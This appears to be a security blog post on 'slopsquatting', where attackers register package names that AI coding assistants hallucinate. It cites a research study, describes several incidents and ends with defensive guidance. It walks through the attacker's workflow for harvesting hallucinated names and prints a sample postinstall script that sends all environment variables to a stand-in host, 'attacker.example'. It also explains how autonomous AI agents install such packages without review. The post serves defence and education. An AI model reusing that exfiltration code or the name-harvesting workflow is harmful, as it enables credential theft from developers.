DuckDuckGo’s AI assistant recently informed users that Donald Trump had died of rabies. The internet laughed. DuckDuckGo apologized. Nobody was harmed.
That’s the harmless version of AI hallucination — a chatbot confidently stating something absurd about a public figure. But AI models hallucinate in other contexts too, and some of those contexts are a lot less funny. When an AI coding assistant invents a package name inside your terminal, and an attacker has already registered that name on npm with a credential-stealing payload baked into the install script, the hallucination isn’t a punchline. It’s a breach.
This attack has a name: slopsquatting. And it’s not theoretical — it has already racked up tens of thousands of installs across multiple documented cases.
TL;DR
- AI coding assistants regularly suggest package names that don’t exist — roughly 20% of AI-generated package recommendations are hallucinated
- Attackers register these hallucinated names on npm and PyPI with malicious payloads
- Real incidents:
unused-imports,huggingface-cli, andreact-codeshifthave collectively reached tens of thousands of installs- AI agents that autonomously install packages make this dramatically worse — no human reviews the suggestion
- Defense requires SBOM generation, dependency allowlists, and verified package signatures — not just scanning for typos
Why This Is Different From Typosquatting
You’re probably familiar with typosquatting: an attacker registers reqeusts hoping someone mistyped requests. The attack relies on human error — a slip of the finger.
Slopsquatting is different in a critical way. The “error” isn’t made by a human. It’s made by the AI assistant the developer has learned to trust.
When you ask GitHub Copilot, ChatGPT, or Claude to help you write code, the model draws on patterns from its training data. Sometimes it generates a package name that sounds plausible, follows naming conventions, and fits the context — but simply doesn’t exist. The model isn’t lying. It’s doing what it was trained to do: predict the most likely next token. It just happens to be wrong.
The term was coined by Python Software Foundation Developer-in-Residence Seth Larson, combining “slop” (low-quality AI output) with “squatting” (the practice of claiming a name someone else will need).
The Scale of the Problem
Researchers from the University of Texas at San Antonio, the University of Oklahoma, and Virginia Tech presented a landmark study at USENIX Security 2025. They generated 2.23 million code samples across 16 different LLMs and analyzed every package reference.
The findings were stark:
| Metric | Result |
|---|---|
| Average hallucination rate across all models | ~19.7% |
| Commercial models (GPT-4 Turbo, etc.) | 5.2% hallucination rate |
| Open-source models | up to 21.7% hallucination rate |
| CodeLlama family | exceeded 33% in some configurations |
| Hallucinations that were pure fabrications | 51% |
| Hallucinations that conflated two real packages | 38% |
| Hallucinations that were typo variants | 13% |
A one-in-five chance that any given AI package suggestion doesn’t exist is not a fringe edge case. At typical developer velocity — dozens of AI-assisted code suggestions per day — these odds add up fast.
There’s another wrinkle: 8.7% of hallucinated Python package names matched existing JavaScript packages on npm, and vice versa. An attacker targeting Python developers can cross-register plausible names on PyPI that the AI keeps inventing, while the name happens to exist harmlessly in a different ecosystem.
How the Attack Works
The mechanics are simple, which is part of what makes slopsquatting so dangerous.
Step 1 — Harvest hallucinations. An attacker queries multiple LLMs with common development tasks: “set up ESLint for a TypeScript project,” “parse CSV in Python,” “connect to Redis in Node.js.” They record every package name the models suggest and filter for names that don’t actually exist in the target registry.
Step 2 — Identify high-frequency hallucinations. Some names appear repeatedly across different models and different queries. These are high-value targets — the more consistently an AI invents a name, the more likely a developer will follow the recommendation.
Step 3 — Register and arm the package. The attacker publishes a package with the hallucinated name. The package may contain a post-install script that executes immediately on npm install or pip install. Common payloads:
- Stealing environment variables (API keys, cloud tokens, database credentials)
- Exfiltrating
~/.npmrc,~/.ssh/, or~/.aws/credentials - Downloading a secondary payload from an external URL to evade static analysis
Step 4 — Wait. The attacker doesn’t need to phish anyone. Every developer who follows their AI assistant’s advice and runs npm install <hallucinated-name> becomes a victim automatically.
Real Incidents
These aren’t hypotheticals.
unused-imports
The legitimate package for this functionality is eslint-plugin-unused-imports. LLMs consistently hallucinate a shorter version: unused-imports. An attacker registered this name on npm with a malicious payload. As of early 2026, the package was still recording approximately 233 weekly downloads despite npm marking it as security-held. Developers weren’t even searching for it — their AI assistants were directing them straight to it.
huggingface-cli
The correct way to install Hugging Face’s CLI tooling is pip install -U "huggingface_hub[cli]". LLMs consistently hallucinate a shorter alternative: huggingface-cli. In 2024, Bar Lanyado of Lasso Security uploaded an empty package under that name to PyPI purely as a proof of concept — no malicious payload. The result: more than 30,000 authentic downloads in three months. Among those who had copy-pasted the hallucinated install command was Alibaba, who had included it in a public repository README. The package itself was benign; the real lesson is the scale of exposure a weaponized version would have had.
react-codeshift
In January 2026, Aikido Security researcher Charlie Eriksen discovered an npm package called react-codeshift — a plausible-sounding conflation of two real tools, jscodeshift and react-codemod, but a name that doesn’t actually exist. The hallucination traced back to a single commit of 47 AI-generated agent skill files where no human had reviewed the output. Before Eriksen defensively claimed the name himself, the package reference had propagated to 237 repositories through forks, been translated into Japanese, and was still receiving daily download attempts from autonomous agents. No malicious payload was ever deployed — but the name sat unclaimed long enough for anyone to arm it.
How Attackers Map the Attack Surface
The attacker’s workflow is more systematic than it might appear. Hallucinated package names aren’t random — they follow predictable patterns tied to how LLMs were trained. An attacker who understands this can build a high-confidence target list in hours.
Query engineering. The attacker crafts prompts that maximize package-name generation: “write a Node.js function that parses Markdown with syntax highlighting,” “set up a Python FastAPI project with JWT auth and rate limiting.” Vague, common tasks produce the most hallucinations.
Cross-model comparison. A name hallucinated by only one model is a low-value target. A name hallucinated consistently across GPT-4, Claude, Gemini, and Mistral is high-value — it means the training data of multiple models independently converged on the same false memory, and many more developers will encounter it.
Registry gap analysis. The attacker checks each harvested name against npm and PyPI. Names that don’t exist become candidates. Names that exist but have suspiciously low download counts may already be squatted by another attacker — or may be unclaimed.
Payload selection. The most common payloads in documented slopsquatting cases are post-install scripts that execute immediately. A typical skeleton in package.json:
{ "name": "unused-imports", "version": "1.0.0", "scripts": { "postinstall": "node ./install.js" }}And in install.js:
const https = require('https');const { execSync } = require('child_process');
// Exfiltrate environment variables to attacker-controlled serverconst data = JSON.stringify({ env: process.env });https.request({ host: 'attacker.example', path: '/collect', method: 'POST' }, () => {}).end(data);This runs silently during npm install. No user prompt, no warning, no indication in the terminal beyond the normal install output.
The Autonomous Agent Problem
If a human developer follows bad advice, the damage is limited to their machine and their project. But increasingly, developers aren’t the ones running npm install — their AI coding agents are.
Agentic tools like Cursor, Claude Code, and various AI IDEs can autonomously read a task description, generate code, install dependencies, and run tests — without a human reviewing each step. When an AI agent hallucinates a package name and autonomously installs it, the attack completes with zero human interaction.
This transforms slopsquatting from a social engineering problem (“trick the developer into doing something wrong”) into a fully automated supply chain attack. The attacker registers the package and waits. The AI does the rest.
The react-codeshift case illustrates this perfectly: the hallucinated name originated in a batch of AI-generated agent skill files, spread through 237 repository forks, and continued accumulating download attempts from autonomous agents — each one faithfully following the infected instructions without a human ever reviewing them.
Why Detection Is Hard
Static scanners don’t catch it before install. A package named unused-imports doesn’t look suspicious. It follows naming conventions, it’s not a misspelling of anything obvious, and it appears in the registry. Traditional typosquatting detectors look for edit-distance matches against known packages — slopsquatted names often pass that check cleanly.
Post-install scripts are trusted by default. Both npm and pip allow packages to run arbitrary code at install time. Most developers never examine these scripts.
The malicious package looks legitimate. Attackers craft a README, add fake stars via bot networks, and sometimes include partial functional code so the package actually does something useful. A developer who installs unused-imports might see it import without error and assume everything is fine — while credentials are already exfiltrating in the background.
LLMs don’t self-correct. If you ask the same model that hallucinated the package name “does unused-imports exist on npm?”, it may confidently confirm that it does. The hallucination is self-consistent.
What You Can Do Now
For developers
Verify before you install. Before running any npm install or pip install from an AI suggestion, spend 10 seconds checking the package registry. Look at: creation date, download count, publisher identity, and whether the README links to a real GitHub repository.
Pin exact versions. Lock your dependency tree with a lockfile (package-lock.json, poetry.lock). This doesn’t prevent the initial compromise but limits drift and makes audits easier.
Audit your AI assistant’s suggestions. Treat package names from AI the same way you’d treat a link in a phishing email — verify before you click.
For teams and organizations
Generate an SBOM. A Software Bill of Materials gives you a complete inventory of every package in your project. Tools like syft, cyclonedx-npm, and pip-audit can generate one automatically. You can’t detect unauthorized additions if you don’t know what’s supposed to be there.
Use dependency allowlists. Define which package registries your CI/CD pipeline is allowed to pull from, and configure your package manager to reject anything outside that list. In npm: .npmrc with registry= scoped to a private mirror. In pip: --index-url and --extra-index-url restrictions.
Scan for hallucination-prone names. Tools like Aikido SafeChain and Snyk are adding slopsquatting-specific detection — flagging packages with suspiciously recent creation dates, minimal download history, and names that match common LLM hallucination patterns.
Restrict autonomous agent permissions. If your AI coding agent can install packages, treat that capability as a privileged operation. Require human approval before any new dependency is added to the lockfile. Most agentic IDEs support approval workflows for tool use.
Verify cryptographic signatures. npm supports package provenance attestations (via npm audit signatures). PyPI is rolling out Sigstore-based signatures. Use them.
Practical audit commands
A few commands you can run right now to assess your exposure:
# npm: check for packages with no provenance attestationnpm audit signatures
# npm: list all direct dependencies with install datesnpm list --depth=0 --json | jq '.dependencies | keys[]'
# pip: check installed packages against known-safe versionspip-audit
# Snyk: scan for supply chain anomalies including slopsquatting signalssnyk test --all-projects
# Generate an SBOM with syft (install: https://github.com/anchore/syft)syft . -o cyclonedx-json > sbom.jsonFor CI/CD pipelines, add a step that compares the post-install lockfile against a known-good baseline and fails the build on any new unreviewed addition:
# GitHub Actions example- name: Verify lockfile integrity run: | git diff --exit-code package-lock.json || \ (echo "Lockfile changed without review" && exit 1)The Broader Pattern
Slopsquatting is a symptom of a shift in how software gets written. When AI assistants became fast and capable enough to generate working code on the first try, developers stopped reading every line they paste. When AI agents became capable enough to act autonomously, developers stopped seeing every action taken.
The trust that makes AI assistants useful is exactly what makes them exploitable. Attackers don’t need to compromise the AI model itself — they just need to understand its failure modes and position themselves to profit from them.
The DuckDuckGo / rabies story is funny because the hallucination was harmless. In software supply chains, the hallucination lands in your package.json, runs at install time, and exfiltrates your AWS credentials before you finish your coffee.
Related Posts
- Detecting Typosquatting Packages — The predecessor attack that slopsquatting extends and amplifies
- GitHub Actions Supply Chain Attack: Shai Hulud — How supply chain attacks propagate through CI/CD pipelines
- HuggingFace AI Supply Chain Attacks 2026 — AI platform as an attack surface
- Miasma / Mini Shai Hulud: AI Agent Supply Chain — AI agents as supply chain attack vectors
- CI/CD Pipeline Attacks: Detect 2026 — Defending the build pipeline
Sources
- CSA Research Note: Slopsquatting — AI Supply Chain — Cloud Security Alliance, April 2026
- Slopsquatting: The AI Package Hallucination Attack Already Happening — Aikido Security
- Slopsquatting: New AI Hallucination Threats & Mitigation Strategies — Snyk
- Slopsquatting Attacks: How AI Phantom Dependencies Create Security Risks — Contrast Security
- AI-Induced Supply-Chain Compromise: A Systematic Review — ResearchGate / USENIX Security 2025
- The Hallucinated Package Attack: Slopsquatting Explained — Mend.io
- AI-Hallucinated Dependencies in PyPI and npm — Rescana